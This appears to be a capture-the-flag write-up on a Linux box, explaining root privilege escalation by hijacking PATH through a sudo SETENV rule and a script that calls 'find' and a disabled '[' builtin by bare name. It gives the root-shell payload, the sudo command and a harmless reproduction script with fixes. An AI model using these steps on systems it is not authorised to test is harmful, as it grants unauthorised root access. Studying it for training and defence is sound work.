Path Variable Hijacking

Absolute Path

After getting a foothold as the user wizard, sudo -l shows that one bash script may be run as root:

Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

The SETENV tag lets us set environment variables on the sudo command line, and that includes PATH: a PATH passed this way takes precedence over the secure_path shown above. Let's take a look at the file contents.

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;   <---- find called by bare name, not /usr/bin/find

Looking through the file we can see that the find command on the last line is not called by an absolute path, so bash resolves it through PATH, and sudo lets us control PATH. We can therefore create a malicious executable named find under /tmp (chmod +x it) and cleanup.sh will run it as root, giving us any command we like. In this case, I'll create /tmp/find with the following contents.

#!/bin/bash
bash   # spawns an interactive shell as whoever runs cleanup.sh, i.e. root via sudo

Time to get root. The $PATH here is expanded by our own shell before sudo runs, so the resulting PATH is /tmp followed by wizard's normal PATH.

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Shell Builtins

In bash, a shell builtin is a command or function that is executed directly by the shell itself, rather than an external executable program that the shell would have to load and run. The bash man page lists [ as one of them:

SHELL BUILTIN COMMANDS
       <... SNIP ...>  The :, true, false, and test/[ builtins do not accept
       options and do not treat -- especially.

Yet if we run which on [, the result is an actual file. which only searches PATH and knows nothing about builtins; [ exists both as a builtin and as an external binary, and bash normally prefers the builtin.

$ which [
/usr/bin/[

Now take another look at the contents of cleanup.sh from the Absolute Path section.

#!/bin/bash
. /opt/.bashrc   <---- sources /opt/.bashrc before anything else runs
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

The script sources /opt/.bashrc, so let's take a look at that file.

# System-wide .bashrc file for interactive bash(1) shells.

# To enable the settings / commands in this file for login shells as well,
# this file has to be sourced in /etc/profile.

# Jameson: ensure that snaps don't interfere, 'cos they are dumb
PATH=${PATH/:\/snap\/bin/}

# Jameson: caused problems with testing whether to rotate the log file
enable -n [ # ] <-----

The last line disables the [ builtin, so every later [ in the script is looked up through PATH like any other command. To see what that means, create an executable file named [ under /tmp.

# With the builtin still enabled, typing [ never reaches our file; bash runs the builtin, which complains:
/tmp$ [
bash: [: missing `]'

# Our file would only run if we named it explicitly, e.g. ./[. Now disable the builtin:
/tmp$ enable -n [

# From here on, [ is resolved through PATH, so with /tmp at the front of PATH, typing [ executes /tmp/[ instead of the builtin.

cleanup.sh sources /opt/.bashrc before it runs the log-rotation check, so by the time it reaches this line the [ builtin is already disabled:

if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]

Each [ in that line is therefore resolved through PATH. With /tmp prepended, that is the malicious file we created, and it runs as root, so we get a root shell before the find line is even reached.

/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
/tmp# id
uid=0(root) gid=0(root) groups=0(root)
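As an added example that is not part of the original writeup, the following bash script reproduces both hijacks described on this page, the bare find from the Absolute Path section and the disabled [ builtin above, in a throwaway directory and without sudo. The stand-in scripts (victim-find.sh, victim-bracket.sh, fake.bashrc) and the hijack/ directory are assumed names, the log file content is constructed, and the payloads print a marker instead of spawning a shell so the outcome can be checked. It needs bash, since enable and type -t are bash builtins.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup or from the target box.
# Reproduces the two PATH hijacks without sudo in a temporary directory.
work="$(mktemp -d)"
trap 'rm -rf "$work"' EXIT
mkdir -p "$work/hijack" "$work/source_images" "$work/log"
echo "some log data" > "$work/log/photobomb.log"   # constructed, non-empty so -s is true

# Stand-in for /opt/cleanup.sh, find part only: find is called by its bare name.
cat > "$work/victim-find.sh" <<'EOF'
#!/bin/bash
find source_images -type f -name '*.jpg' -exec echo chown root:root {} \;
EOF

# Stand-in for /opt/.bashrc plus the log-rotation check from cleanup.sh.
cat > "$work/fake.bashrc" <<'EOF'
enable -n [ # ]
EOF
cat > "$work/victim-bracket.sh" <<'EOF'
#!/bin/bash
. ./fake.bashrc
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  echo "rotated"
fi
EOF

# Hijack payloads for find and [: print a marker instead of spawning a shell.
for name in find '['; do
  printf '#!/bin/bash\necho "HIJACKED %s as uid $(id -u)"\n' "$name" > "$work/hijack/$name"
done
chmod +x "$work"/victim-*.sh "$work"/hijack/*

# run_with_path <dir-or-empty> <script>: run the script from $work with an optional
# directory prepended to PATH, mirroring `sudo PATH=/tmp:$PATH /opt/cleanup.sh`.
run_with_path() {
  local prefix="$1" script="$2"
  if [ -n "$prefix" ]; then
    ( cd "$work" && PATH="$prefix:$PATH" "./$script" )
  else
    ( cd "$work" && "./$script" )
  fi
}

# bracket_kind <0|1>: how bash resolves [ before (0) or after (1) `enable -n [`.
# Runs in a subshell so the caller's own [ builtin is left alone.
bracket_kind() {
  if [ "$1" = 1 ]; then
    ( enable -n [; type -t [ )
  else
    ( type -t [ )
  fi
}
```

Run as a normal user, run_with_path "" victim-find.sh prints nothing (the real find sees no jpg files), while run_with_path "$work/hijack" victim-find.sh prints the marker from the fake find. bracket_kind shows [ changing from builtin to file once enable -n [ has run; without a PATH prefix victim-bracket.sh then falls through to /usr/bin/[ and prints "rotated", and with the hijack directory prepended it executes hijack/[ twice, once per test in the if. The fixes are the obvious ones: don't grant SETENV, and have the script set its own PATH or call /usr/bin/find and /usr/bin/[ by absolute path.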
